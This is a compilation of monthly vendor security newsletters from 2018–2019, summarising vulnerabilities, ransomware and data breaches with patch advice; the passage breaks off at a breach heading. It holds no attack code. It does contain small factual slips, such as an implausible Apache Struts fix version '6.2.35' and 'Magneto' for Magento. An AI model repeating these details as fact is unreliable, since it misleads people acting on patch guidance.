Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implication on your environment.

Shearwater Security Report | July 2019


Our monthly Security Report highlights some of the recent cybersecurity threats making headlines around the world.

Compiled by Shearwater’s experienced cybersecurity professionals, this report identifies new attack vectors used by cybercriminals, and helps you stay one step ahead of the attackers.

In this report we feature:

· Firefox – critical vulnerability uncovered by targeted attacks

· BlueKeep – could it be the next WannaCry?

· Up to 57% of email at risk 

· Cisco patch to stop online forgery

· Not so sunny in the Sunshine State

· Threats from within can be devastating too

· LooCipher – doing the work of the devil 

· Now criminals adopt security measures too 

Current Threats and Exploits

· Firefox critical vulnerability uncovered by targeted attacks

firefoxUncovering a bug that can be exploited to provide attackers with remote code execution, Mozilla moved quickly to address the critical vulnerability by issuing a patch. The bug, which would still require a separate sandbox escape, could also be exploited for universal cross site scripting.

According to Mozilla, the vulnerability (CVE-2019-11707) “can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash.”

The vulnerability has been fixed in Firefox 67.0.3 and Firefox ESR 60.7.1.(1)

· BlueKeep – could it be the next WannaCry?

bluekeepIt’s been two years since WannaCry. The indiscriminate virus spread like wildfire, infecting almost one quarter million computers globally back in 2017. It all started when someone unwittingly opened an infected email attachment.

Now there’s the potential for an even more devastating attack.

A vulnerability, known as BlueKeep (CVE-2019-0708) exists within the Remote Desktop Protocol (RDP) used by the Microsoft Windows operating system. An attacker can exploit this vulnerability to perform remote code execution on an unprotected system.

While Microsoft has already issued a patch to repair the vulnerability, it is believed many systems are still at risk.

According to Microsoft, an attacker can send specially crafted packets to one of these operating systems that has RDP enabled. After successfully sending the packets, the attacker would have the ability to perform a number of actions including:

    • Adding accounts with full user rights;
    • Viewing, changing, or deleting data; or
    • Installing programs.

This exploit, which requires no user interaction, must occur before authentication to be successful.

BlueKeep is considered “wormable” because malware exploiting this vulnerability on a system could propagate to other vulnerable systems. Thus, there’s a very real risk a BlueKeep exploit would be capable of rapidly spreading in a fashion similar to the WannaCry malware attacks of 2017.(2)

· Up to 57% of email at risk 

email“Return of the WIZard” is a vulnerability allowing hackers to send malicious email to Exim software. Exim is a popular email server software, or message transfer agent (MTA), used to send and receive email. With an estimated 57% of email servers operating Exim software, there is an acute risk to email disruption from the vulnerability.

According to Microsoft, an active Linux worm is targeting Exim. The worm allows attackers to remotely execute commands on a vulnerable server.

It is known there are at least two groups of hackers seeking to exploit the vulnerability to run malicious code. Hackers have also downloaded and installed a cryptocurrency miner on compromised servers.

While a mitigation is already in place to block the worm, Microsoft states that Azure servers with Exim software can still be infected or hacked.

The vulnerability (CVE-2019-10149) was discovered in Exim 4.87 to 4.91.

If not stopped, the worm would use the infected server to search for other vulnerable hosts to infect. Anyone using an email server with Exim software should install the latest patches as soon as possible.(3)

· Cisco patch to stop online forgery

ciscoWe all login to a variety of online accounts daily.

Whether it’s email, online banking, e-commerce, or any other type of online account we access through a web page or app, we expect that once we enter our username and password, we can transact safely.

However, hackers can leverage a “cross-site request forgery” (CSRF) flaw to force the execution of unwanted actions in web pages or apps, even once we have already been authenticated by logging in.

These attacks can be deployed via a malicious link and the action is executed with the same privileges of the logged in user.

Cisco recently identified a vulnerability (CVE-2019-1904) that affects outdated versions of Cisco IOS XE. The vulnerability exists in the web-based user interface of the product and exists due to insufficient CSRF protections on an affected device.

To rectify the problem, Cisco released an updated version of its IOS XE software to patch the CSRF vulnerability.(4)

 


Recent Breaches

· Not so sunny in the Sunshine State

floridaFlorida may be America’s Sunshine State, but recently things have been looking pretty gloomy.

Lake City, Florida is finally recovering from a devastating Triple Threat ransomware attack that knocked out its email and online payment systems on June 10, according to City Manager, Joe Helfenberger.

Cloud cybersecurity company, AppRiver, initially reported the Triple Threat back in January.  However, at the time they only mentioned it was a phishing scheme designed to gather credentials and did not indicate there was a ransomware component to it.

Lake City updated its status on June 12, saying that while most systems were still down, progress was being made to restore the network and regain access to the locked data.

Luckily, systems used by the city’s police, fire and other emergency services were not impacted.

Eventually, city authorities reportedly paid $460,000 in Bitcoin to the attackers to recover their data and systems. This attack serves as yet another warning why backups are so important for recovery after a ransomware attack.(5)

· Threats from within can be devastating too

Desjardins-GroupDesjardins Group is the largest federation of credit unions in North America.

As custodians for so much confidential information, including the personal and financial records of roughly 2.9 million Desjardins Group members, data security is paramount.

Yet despite systems in place to prevent unauthorised intrusions, data was leaked by an employee who disclosed it to people outside the organisation without permission.

According to a statement by Desjardins, the information disclosed includes:

  • First and last names;
  • Dates of birth;
  • Social insurance numbers;
  • Addresses;
  • Phone numbers;
  • Email addresses; and
  • Details of banking habits and Desjardins products.

Awareness of the data leak emerged on June 14, when local police “provided Desjardins with information confirming that the personal information of more than 2.9 million members (including 2.7 million personal members and 173,000 business members) had been disclosed to individuals outside the organization.”

This is a timely warning that measures to prevent outside intrusion may not do anything to protect you from malicious actions undertaken by those inside your organisation.(6)

 


Other News

· LooCipher – doing the work of the devil 

loocipherLooCipher, the newly discovered ransomware that encrypts all files on an infected computer and demands a ransom payment of 300 Euros within five days, is pure evil.

The ransomware is spread by a spam campaign that delivers a Word document called Info_BSV_2019.docm. Opening the document causes macros to be enabled, links to a Tor server and downloads an .exe file.

During this time, all the computer’s files are encrypted and cannot be read, but they are not deleted. If the ransom is not paid via Bitcoin within five days, all your documents will be permanently destroyed.

This is another reminder that you should never open attachments in emails that you do not recognise.(7)

· Now criminals adopt security measures too 

httpsThe “S” in “HTTPS” stands for “SECURE”.

That letter signals to visitors that the site is secure for communications and that the privacy and integrity of data exchanged on the site is protected. It helps prevent “man-in-the-middle” attacks.

However, as attackers become more sophisticated, they too are beginning to use HTTPS sites for their malicious activities.

With the adoption of cryptographic protocols for secure website communications, cybercriminals are moving to HTTPS to keep their operations afloat.

Over half of phishing websites detected in the first quarter of this year used digital certificates to encrypt the connections from the visitor. This is a trend that has been growing since mid-2016.

HTTPS is designed to protect user privacy by encrypting the traffic between a server and the browser. This prevents third parties from viewing the data that’s exchanged. As web browsers began warning users that their connection was not secure if the site wasn’t HTTPS, phishing scammers began following the HTTPS trend.

Nowadays, impersonating an HTTPS website is virtually impossible without a Transport Layer Security (TLS) certificate, a cryptographic protocol designed to provide communications security over a computer network. While obtaining a TLS certificate was complicated and expensive in the past, these days they can be obtained for free.

With TLS certificates now more easily accessible, scammers are accessing them to give their websites the appearance of being secure.

It’s another reminder that when transacting online, all is not what it seems.(8)

 

To stay secure, you need to be proactive.

Cybercriminals are constantly looking for ways to exploit vulnerabilities and will use any opportunity to circumvent your security systems.

Keep on top of the latest advances in cybersecurity and ensure your organisation stays ahead of the threats with Shearwater’s team of expert consultants.

Together, we’ll develop a comprehensive security roadmap for your organisation that takes into account your specific needs and circumstances.

Take the first step towards enhancing your security and speak with us today.

 

(1) https://www.darkreading.com/attacks-breaches/critical-firefox-vuln-used-in-targeted-attacks/d/d-id/1335011
(2) https://www.us-cert.gov/ncas/alerts/AA19-168A
(3) https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-about-worm-attacking-exim-servers-on-azure/
(4) https://www.bleepingcomputer.com/news/security/cisco-ios-xe-software-receives-fix-against-high-severity-flaw/
(5) http://www.scmagazine.com/home/security-news/ransomware/lake-city-recovering-from-ransomware-attack/
(6) https://www.bleepingcomputer.com/news/security/desjardins-group-data-leak-exposes-info-of-29-million-members/
(7) https://www.bleepingcomputer.com/news/security/new-loocipher-ransomware-spreads-its-evil-through-spam/
(8) https://www.bleepingcomputer.com/news/security/phishing-websites-increase-adoption-of-https/


 

This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.

April 2019 Security Report | Shearwater Solutions


Featured this security report: ASUS release a critical software update to combat “ShadowHammer” Trojan Malware, CISCO’s RV320 and RV325 small business routers are vulnerable to attack, Zero-day vulnerabilities found in Google Chrome and Microsoft Windows are being exploited simultaneously, the recent WinRaR vulnerability is being abused en-masse by threat actors, Adobe patches Cold Fusion to alleviate vulnerability and Apple also patches up a number of serious vulnerabilities in its iOS platform. The latest data breach news includes; between 6TB and 10TB of data extracted from Citrix’s internal network and a second Toyota data breach has leaked up to 3.1 million pieces of customer data. In other news, Windows 7 and Windows Server 2008 R2 support will cease in January 2020.

Current Threats and Exploits


  • ASUS malware software update:
    A critical software update has been released from ASUS to combat a known Trojan malware attack called “ShadowHammer,” the attack itself was disguised as a “critical” software update. Although ASUS stated that “only a small number of a specific user group was found to be targeted,” Kaspersky Labs predicts that the attack could have been distributed to nearly 1 million machines and installed on hundreds of thousands. Along with the software patch, ASUS also introduced a “Live Security” program that users can use to scan their device to see if it has been involved in any known malware attacks. (1)
  • CISCO vulnerability patching:
    Cisco Systems issued 24 patches tied to vulnerabilities in its IOS XE operating system and warned customers that two small business routers (RV320 and RV325) are vulnerable to attack and that no patches are available for either. A total of 19 of the bugs were rated as “high severity” by Cisco, with the others rated as medium. The two router vulnerabilities are rated as “high severity” and are part of Cisco’s Dual Gigabit WAN VPN RV320 and RV325 line of small business routers. Both router flaws were first patched in January, however Cisco said that both patches were “incomplete” and that both routers were still vulnerable to attack. Firmware updates that address these vulnerabilities are not currently available. Cisco also says that there are no workarounds that address either vulnerability. (2)
  • Google Chrome Zero Day Exploit:
    Google has reportedly patched two previously publicly-unknown vulnerabilities – one affecting Google Chrome and another in Microsoft Windows, both were being exploited together. Google released an update for all Chrome platforms that was delivered through the auto-update feature. This vulnerability leverages a memory mismanagement bug that could allow an attacker Remote Code Execution, allowing unauthorized users to inject malicious code. Google has encouraged all Chrome users to verify that Chrome auto-update has applied the 72.0.3626.121 update. (3)
  • WinRaR ACE file extension:
    WinRAR is a file archival tool that is widely used. Users should update to the latest version of WinRAR, or remove it from their computer, as there is no automatic update feature in the software. Shearwater recommends checking if WinRAR is installed on devices in the network. If WinRAR is discovered and it’s verified that it is required, it is critical that the latest version is installed. If WinRAR Is not required, the software should be removed. (4)
  • Adobe Cold Fusion Exploits:
    Adobe’s “Cold Fusion” website development platform has released a patch to remove a vulnerability that could allow a remote attacker to execute arbitrary code. The vulnerability allows a malicious attacker to upload a file of their own choosing and then cause any code within the file to be executed by issuing a HTTP request. All previous versions of Cold Fusion are reported to be vulnerable to the attack and it is recommended that anyone using Cold Fusion updates to the latest version as soon as possible. Additionally, it has also been observed that attacks against the vulnerability are already being conducted. (5)
  • Apple Patches a Number of Serious Vulnerabilities in iOS
    Apple recently released a patch to fix a number of serious vulnerabilities that were discovered in its WebKit framework, which is used by browsers on the iOS platform. The vulnerabilities range in severity, however at their worst they allow for a specially crafted web page to execute arbitrary code. It is recommended that all users of iOS devices update to the latest version of iOS as soon as possible. (6)


It is important that all users install the latest updates to stay protected from security threats.

Recent Breaches


  • Major Citrix Data Breach:
    Citrix recently released information indicating that they had undergone a major data breach where malicious actors were able to gain access to their internal network. After forensic analysis, the breach was determined to have been performed by a sophisticated attacker and it is thought they were able to extract between 6TB and 10TB of data from the internal Citrix network. Furthermore, this data included business documents with details of several of Citrix’s clients. It was also revealed that the attackers likely gained access into the environment by brute force, several employee’s accounts secured with weak passwords were compromised. This breach, like a number of other recent breaches, re-enforces the need to ensure all users have strong passwords and two factor authentication enabled on their accounts. (7)
  • Second Toyota Data Breach:
    Toyota has apologized to customers after a large data breach at its Tokyo area sales network was discovered on 21st March. Toyota said unauthorized network access to a server used by sales subsidiaries may have leaked up to 3.1 million pieces of customer data outside the company. Toyota is still investigating the extent of the data breach, and whether or not the information was exfiltrated. In late February this year, Toyota Australia suffered a cyber-attack that took out its email service and other systems. Toyota has not attributed either of these hacks to any particular actor or group, or advised whether the two are connected. (8)

Other News


  • End of Windows 7 and Windows Server 2008 R2 support:
    Starting on 18th April 2019, users running Windows 7 will start seeing pop-ups reminding them that support for the aging operating system will end in mid-January 2020. Reasons users may have for not upgrading to Windows 10 include concerns about applications not working and computers that cannot run Windows 10. Users with an enterprise license can arrange continued support for some business Windows 7 installations, and users with embedded Windows 7 may have different life cycle dates. (9)

References

  1. Asus software updates were used to spread malware, security group says
  2. Cisco Releases Flood of Patches for IOS XE, But Leaves Some Routers Open to Attack
  3. Disclosing vulnerabilities to protect users across platforms
  4. ‘100 unique exploits and counting’ for latest WinRAR security bug
  5. Security updates available for ColdFusion | APSB19-14
  6. Latest iOS 12.2 Update Patches Some Serious Security Vulnerabilities
  7. Citrix discloses security breach of internal network
  8. Millions of customers’ data accessed in second Toyota hack
  9. Windows 7 Update Support Ends One Year From Today

This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.

December 2018 Security Report | Shearwater Solutions


Featured this month: Exposed Remote Desktop connections create a soft target for attackers, email distribution platforms are increasingly being hijacked to facilitate mass phishing campaigns, several Self Encrypting Drives have multiple vulnerabilities, a VirtualBox Zero Day vulnerability, breaches that caused inconvenience for Dell, created danger and disruption for an Ohio hospital and exposed over 500,000 guests’ data in a breach dating back to 2014 for the Marriott hotel chain. In other news, a Windows 10 (1703 and newer) update allows Windows Defender to operate in a sandboxed environment and Google’s Quic protocol will replace TCP, to offer both compression and encryption, in the next revision of the HTTP protocol.

Current Threats and Exploits


  • Exposed Remote Desktop connections create soft target for attackers:
    Remote Desktop provides a convenient tool for remote administration and for users to access internal resources. It’s also commonly scanned for, and targeted by, attackers attempting to gain unauthorized access to internal networks. Typically (via brute forcing of accounts or through the use of known credentials harvested via phishing or breach data) an attacker will look to gain access to the remote desktop host before launching subsequent attacks internal to the network (e.g. ransomware, cryptomining or data exfiltration).
    In order to avoid falling victim, it’s important that exposed Remote Desktop Protocol (RDP), and other services are appropriately hardened. Simple steps such as geoblocking, good password practices and monitoring of external facing hosts can significantly increase the difficulty of entry for attackers trying to take over your RDP host this holiday season.
  • Marketing email campaign hijacking leads to mass distribution of phishing:
    Shearwater has identified a number of incidents where a company’s marketing or email distribution platforms have been compromised in order to facilitate mass phishing campaigns. Through the use of Business Email Compromise (BEC attack), attackers are frequently looking to gain access to platforms such as MailChimp, that are prepopulated with recipient lists. This provides an easy opportunity to further phish unsuspecting victims.
    If you are unsure of the source of an email, a simple phone call to the sender or your IT security team can help validate the contents in a timely fashion. And if you identify a phishing campaign of this nature, contacting the mail platform and sender to alert them to the incident is also recommended.
  • Self-Encrypting Drives have multiple vulnerabilities:
    There are multiple vulnerabilities in implementations of ATA Security or TCG Opal Standards in Self-Encrypting Disks (SEDs), which can allow an attacker to decrypt contents of an encrypted drive. There is no cryptographic relation between the password provided by the end user and the key used for the encryption of user data. This allows an attacker to access the key without knowing the password provided by the end user, allowing the attacker to decrypt information encrypted with that key. According to the National Cyber Security Centre – The Netherlands (NCSC-NL), the following products are affected by CVE-2018-12037:

    • Crucial (Micron) MX100, MX200 and MX300 drives
    • Samsung T3 and T5 portable drives
    • Samsung 840 EVO and 850 EVO drives (In ATA high mode these devices are vulnerable, in TCG or ATA max mode these devices are not vulnerable.)

The vendors have issued patches to address the vulnerabilities. We recommend that you update to the latest patches as soon as possible.

  • VirtualBox Zero Day vulnerability:
    A new vulnerability has been discovered in VirtualBox’s Intel E1000 NIC driver code when it is operating in NAT mode. The vulnerability, which affects all versions of VirtualBox up to and including 5.2.20, allows malicious code running in a guest VM to gain application level control over the host. To make matters worse, the vulnerable code is shared between a number of different guest operating systems, meaning that it can be exploited from almost any guest. The vulnerability was not responsibly disclosed, and therefore there is currently no patch available.
    We recommended that users of VirtualBox change the type of virtual network adapter to something other than the Intel E1000 or place it into a mode other than NAT. (1)

Recent Breaches



A data breach at Marriott hotel chain has exposed personal details of up to 500,000 guests.

  • Dell resets all customer passwords after cyberattack:
    Dell suffered a security breach on November 9, 2018. Hackers succeeded in breaching the company’s network but were detected and stopped. Investigators found no evidence that the hackers succeeded, but they have not ruled out the possibility that some data was stolen. Analysis of the attack concluded the attackers were seeking customer names, email addresses and scrambled passwords.
    We recommend that Dell customers are vigilant for suspicious emails or account activity. (2)
  • Ransomware attack forced Ohio hospital system to divert ER patients:
    A malware infection and ransomware attack that hit computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Centre over the Thanksgiving weekend reportedly disrupted the hospitals’ emergency rooms causing ambulances to be diverted to other area hospital emergency rooms. The attack hit on the evening of Friday, Nov. 23, leaving the hospitals temporarily unable to accept ER patients via emergency responders.
    A spokesperson for the hospitals said that there has been no patient information breach. (3)
  • Marriott’s massive data breach:
    The Marriott hotel chain has reported a massive data breach that was discovered to be related to a cyberattack dating back to 2014. The breach affected personal details of up to 500,000 guests of its Starwood branch, such as Westin, Sheraton, Le Meridien, St Gegis and W Hotels. It’s believed that personal information for around 327,000 reservations was exposed, including name, address, phone number, passport number, details of the stays, etc. Credit card numbers and expiry dates of some guests may also have been taken. (4)

Other News


  • Windows Defender sandboxed:
    Current versions of Windows 10 (1703 and newer) have received an update which will allow Windows Defender to operate in a sandboxed environment. As anti-malware software requires complete visibility over the whole system to provide effective protection, they need to run with very high privileges. As a result of these high privileges, they have become a common target for malware and malicious actors, as a successful compromise could give them control over the system. To reduce the risk, Microsoft have isolated Windows Defender in a sandboxed environment, making it harder for a compromise in Windows Defender to take over the system.
    Sandboxing is not currently enabled by default in Windows. However, if users wish to enable it on their system, they can issue the following command from an administrator command prompt and restart their system “setx /M MP_FORCE_USE_SANDBOX 1”. (5)
  • HTTP 3 using UDP:
    The Internet Engineering Task Force (IETF) has stated that the next revision of the HTTP protocol will not use Transmission Control Protocol (TCP) for its transport layer connections, but Google’s QUIC (Quick UDP Internet Connections) protocol instead. QUIC, which itself operates using UDP, was originally designed by Google and provides both compression and encryption.
    When the new protocol becomes more widely used, firewall rules will need to be permitted to allow UDP 443 connections. (6)

References

  1. Zero-Day Exploit Published for VM Escape Flaw in VirtualBox
  2. Dell.com resets all customer passwords after cyber attack: statement
  3. Ransomware Attack Forced Ohio Hospital System to Divert ER Patients
  4. Massive data breach at Marriott’s hotels exposes private data of 500,000 guests
  5. Windows Defender Antivirus can now run in a sandbox
  6. HTTP-over-QUIC to be renamed HTTP/3

 


This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.

WebEx, LibSSH Authentication & D-Link Router Vulnerabilities | Shearwater InfoSec Report


The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Featured this month: A WebEx vulnerability that allows a remote attacker to execute code on the machine, a LibSSH authentication vulnerability that allows a remote attacker to authenticate without valid credentials, 3 vulnerabilities in a number of D-Link routers which combine to allow a remote attacker to take over a device, a number of new Drupal code execution vulnerabilities and a Windows zero-day vulnerability. Recent breaches include Cathay Pacific and iNet and in security news, the Californian government has passed a bill to mandate manufacturers improve passwords on IoT devices.

Current Threats and Exploits


  • WebEx Remote Code Execution Vulnerability:
    A vulnerability with Cisco Software’s Web meeting/presentation client, WebEx Client, has been discovered that would allow a remote attacker to execute code remotely on the machine.
    We recommend that users patch their WebEx Client Software to version 33.6.0 to prevent the usage of this vulnerability. (1)
  • LibSSH Authentication Vulnerability:
    A new vulnerability has been discovered in the LibSSH package, which is used to add support for SSH to devices. The vulnerability, assigned CVE 2018-10933, allows a remote attacker to present the server with a successful authentication message (SSH2_MSG_USERAUTH_SUCCESS) upon connecting and the server will accept the message. As a result, the attacker can easily become authenticated to the device without needing to present valid credentials. The vulnerability is reported to exist in all versions of LibSSH after 0.6.
    Users of LibSSH are advised to upgrade to the latest versions, 0.8.4 and 0.7.6, which have been fixed to remove the authentication flaw.(2)
  • D-Link Routers Vulnerable External Control:
    Security researchers have identified three vulnerabilities in a number of D-Link routers which, when combined, allow a remote attacker to take control of the device. The first vulnerability allows an unauthenticated attacker to browse the file system of the router to obtain the password file. The second vulnerability results in the password file they obtain being stored in cleartext, giving them access to the raw passwords. Finally, the authenticated attacker can execute arbitrary code on the device, through the Web interface. As an attacker can obtain the raw passwords using the first two vulnerabilities, they can take over the device. D-Link was informed of the vulnerability back in May this year, however they have failed to release any patches.
    It is strongly advised that anyone using D-Link routers ensures they are not configured to allow access to their Web interface from the Internet. (3)
  • More Drupal Code Execution Vulnerabilities:
    A number of new remote code execution vulnerabilities have been discovered in the Drupal content management system. One of the most critical vulnerabilities exists in the default mail backend, which does not check for shell arguments when processing emails, allowing them to be executed on the server.
    Users should ensure that Drupal 7 is updated to version 7.60, Drupal 8.5 is updated to version 8.5.2 and Drupal 8.6 is updated to version 8.6.2. Additionally, any versions of Drupal 8 before version 8.5 are no longer supported and, therefore, will not receive the security updates. (4)
  • Windows 10/Server 2016/Server 2019 Microsoft Data Sharing Zero-day Vulnerability:
    A security researcher has disclosed a Windows zero-day vulnerability on Twitter for the second time in the span of two months. Proof of Concept (PoC) code for this vulnerability was also published on GitHub, which can be used to delete crucial Windows files and cause the operation system to crash. The vulnerability affects the local Microsoft Data Sharing service (dssvc.dll), present in recent versions of Windows OS, such as Windows 10 (all versions patched with latest October 2018 update), Windows Server 2016 and Windows Server 2019. An attacker, who already has access to the system, can exploit this vulnerability to elevate their privileges allowing them to delete files that normally can only be deleted by admins and take further actions with appropriate modification on the PoC.
    Microsoft is currently working on a fix for this vulnerability. In the meantime, we recommend following best practice security practices and to be vigilant for anomalous activity. (5)

Recent Breaches



A data breach at Cathay Pacific Airways has prompted calls to review Hong Kong’s breach disclosure rules.

  • Cathay Pacific Major Data Breach:
    The Hong Kong flight carrier Cathay Pacific has suffered a major data breach, in which cybercriminals had accessed the personal data of over 9.4 million passengers. The breach exposed private details, including passenger names, nationalities, dates of birth, phone numbers and email addresses. Cybercriminals have also compromised 860,000 passport numbers, 245,000 Hong Kong identity card numbers, 403 expired credit card numbers and 27 credit card numbers with no card verification value (CVV).
    Hong Kong’s Privacy Commissioner, Stephen Wong Kai-yi, has pledged legal help for affected customers. Cathay Pacific and IT experts have recommended that passengers are vigilant for suspicious emails or account activity, as they anticipate phishing activities following the leak. (6)
  • Leaky Amazon S3 Bucket causes Washington ISP Customer data to be Exposed:
    Washington Internet Service Provider Pocket iNet has had over 73GB’s of data publicly exposed due to a misconfigured Amazon S3 Bucket. The exposed data includes plaintext passwords and AWS secret keys for Pocket iNet employees, internal diagrams of their infrastructure, details of configuration, inventory lists and photographs of their equipment. It also exposed priority customer details using the service.
    This type of breach can be mitigated by setting up a policy to check Amazon S3 Bucket configurations, as well as making sure buckets aren’t public facing. (7)

Other News


  • California passes Bill on IoT Device Security:
    The Californian government has passed legislation that bans the use of default weak passwords on IoT devices. Device manufacturers must ensure that IoT devices have a unique default password or a password that changes on the first authentication attempt.
    This should assist in device security, preventing these devices from being compromised by the use of hardcoded and default credentials. (8)

References

Information Security Report | October 2018


The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

This month features a new strain of malware designed to extract credit card information on an eCommerce platform, Internet scanning malware targeting public SSH servers using default account names with elevated system access, more hardcoded root passwords in Cisco and a new acoustic attack method that can narrow down on the authentication pattern used to unlock android devices. Notable breaches include card skimming malware targeting electrical sales site Newegg, malicious banking apps impersonating ANZ and CBA apps on the Google Play store and customer data stored in plaintext on auctioned NCIX hardware.

Current Threats and Exploits


  • Magneto eCommerce Malware:
    A security researcher has discovered a new strain of malware designed to extract the credit card information users enter on the eCommerce platform Magneto. The malware has been found to have infected more than 7000 Magneto sites currently in operation. To infect the site, a cyber adversary performs a brute force attack against the site to allow them to authenticate and then embeds a line of JavaScript. The JavaScript monitors characters input by the user and sends them to magentocore[dot]net host in Russia.
    It is recommended that, if you are running Magneto, the server is investigated to ensure that it has not been targeted. (1)
  • Acoustic Echo Location Attacks for Smartphones:
    Security researchers have uncovered a new acoustic attack method that can be used to narrow down on the authentication pattern used to unlock android devices. The attack uses the phone’s speakers to emit inaudible sounds which echo off the user’s finger and are then detected by the phone’s microphones. Using the echoed information, the approximate movements of the user’s finger can be determined. The researchers used this information to track a user’s finger movement when entering their unique unlock pattern on a Samsung android phone. Using the technique, they were able to reliably reduce the number of possible patterns by 70%, allowing them to gain access to the device in a much shorter period of time.
    While the attack is only theoretical at the moment, users are advised to use a more robust method of authenticating to their device, such as a PIN number instead of the unlock pattern. (2)
  • Malware targeting public SSH servers:
    Researchers have discovered GoScanSSH malware that scans the Internet and targets public SSH servers using default accounts. The malware is not yet known to exploit any known vulnerabilities but was found to target default account names that are likely to have elevated system access like ‘root’ and ‘admin’. After it successfully authenticates on a system, a copy of the malware is uploaded and used to carry out the same attack against other systems. It then checks into its command-and-control (C&C) server using the Tor2web proxy service to keep the C&C server hidden from defensive measures. It was noted that when the malware scans for systems to infect, it excludes IP networks that belong to certain military and government networks.
    As a security best practice, and to prevent the risk of being infected, network administrators should ensure that default account names (especially those with elevated system access) should either not be used or should be configured to use very complex passwords. Anomalous traffic using Tor web proxies should also be investigated as likely possible indicators of compromise. (3)
  • More Cisco Hard Coded Passwords:
    Cisco has released patches for their Video Surveillance Manager software which removes a hardcoded root password. This hardcoded password allows an attacker to authenticate to any VSM device as root, using a known password. The vulnerability only affects VSM releases 7.10, 7.11 and 7.11.1.
    Users of these systems are advised to install the patches as soon as possible. (4)


Magecart credit card skimming malware has struck again, this month targeting computer and electrical sales site Newegg.

Recent Breaches


  • Newegg customers affected by Magecart Malware:
    The computer and electrical sales site Newegg has been infected with card skimming malware, known as Magecart. Magecart, which has also attacked both British airways, as well as Ticketmaster, was detected on Newegg’s website, skimming credit card details on their payment processing from the 14th of August to the 18th of September. Newegg released a statement informing customers that they are performing an extensive investigation into how their site was infected, as well as providing a warning to those who purchased goods from them during the breach.
    The statement recommends affected users to freeze their credit cards and to monitor and report any suspicious activity that occurs on their bank accounts. (5)
  • NCIX Customer Data Breach:
    Servers seized by the landlord of the, now closed, Canadian hardware retailer NCIX were auctioned to private buyers without first removing confidential customer information. It is claimed that the hardware contained credit card numbers for over 260,000 customers for purchases made as far back as 2007, all stored in plaintext. The servers also contained other customer data including purchase histories, contact information and password hashes.
    The breach has sparked debate around responsibility. (6)

Other News


  • Fake banking apps scam on Google Play store:
    More than a thousand bank customers have downloaded malicious banking apps that impersonate legitimate ANZ and CBA banking apps from the Google Play store since they were first reported as fraudulent in June until the international security group ESET alerted Google in early September. ESET highlighted that, besides ANZ and CBA, banks from the UK, Switzerland and Poland and an Australian cryptocurrency exchange were also targeted. As the apps were available on the official Android app store, they managed to gain bank customers’ trust and steal their credentials, including login account, password and credit card details. Neither ANZ nor CBA were obliged to inform the public or notify authorities as they were not compromised themselves. The incident has exposed serious issues in Google Play’s automated verification process for new apps.
    Customers who believe they may have downloaded a fake app or have noticed unusual transactions should contact their bank immediately. (7) (8)

References

Information Security Report | September 2018


The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

This month features a serious vulnerability in a number of HP printer/fax combinations, a new twist on exploiting MikroTik routers to mine crypto currency, a critical Apache Struts code vulnerability that doesn’t require installed plugins, details of the Reddit 2007 backup database breach, Google’s forthcoming plans to block the injection of third-party code into their browser processes and how to get free replacement Symantec certificates to avoid FireFox untrusted certificate warnings.

Current Threats and Exploits


  • HP Printer/Fax Combo Vulnerabilities:
    Security researchers have discovered a serious vulnerability in a number of HP printer fax combination units. The vulnerability allows a remote attacker to take control of the device by exploiting a vulnerability in the built-in fax modem. The only prerequisites to launch the attack are for the printer to be connected to a phone line and for the adversary to know the fax number of the device. This makes the vulnerability especially suitable for targeted attacks. Once an attacker has gained control of the device, they are able to pivot across to the LAN interface of the device and start launching attacks back into the internal computer network the printer is connected to. During a demonstration, the security researchers who found the vulnerability were able to use the printer to launch the eternal blue exploit against computers connected to the same LAN as the printer.
    HP have released patches for the affected devices and it is strongly recommended you check for updates if you use a HP printer/fax combination device. If you do not make use of the fax component of the device, it is recommended you disconnect it from the phone line to lower the attack surface. (1)
  • Crypto Currency Mining Code Dynamically Injected into Browsing Sessions:
    Attackers have made use of a well-known exploit to compromise over 200,000 MikroTik routers and inject and use them to perform crypto currency mining activities. The attack, however, proceeded in a different manner from the usual. Instead of using the routers to mine crypto currency, they used the router to dynamically inject the coinhive crypto currency mining JavaScript code into HTTP sessions passing through it. This caused users downstream of the compromised router to receive the mining code and begin generating revenue for the attacker. Additionally, if web servers resided behind an affected router, it would also inject mining code into all the HTTP pages delivered by the server. To make matters worse, the affected routers included ISP grade routers, greatly increasing the number of affected users. It is important to note that only HTTP sites are affected, as the router is unable to inject the code into encrypted HTTPS sessions.
    It is recommended that all users of MikroTik routers ensure they have the latest patches installed. (2)
  • Another Critical Apache Struts Remote Code Execution Vulnerability:
    Apache has announced another critical remote code execution vulnerability in their Struts library. It was reported that the vulnerability exists in the Struts core itself and therefore is exploitable without the need for any installed plugins. Additionally, the attack can be performed without the attacker needing to authenticate to the page and it is thought to be very easy for an attacker to determine if a page is vulnerable to the attack.
    Apache Struts users are advised to update to version 6.2.35 or 2.5.17 to mitigate the vulnerabilities ASAP. (3)

 

Recent Breaches


  • Old Reddit Data Exposed:
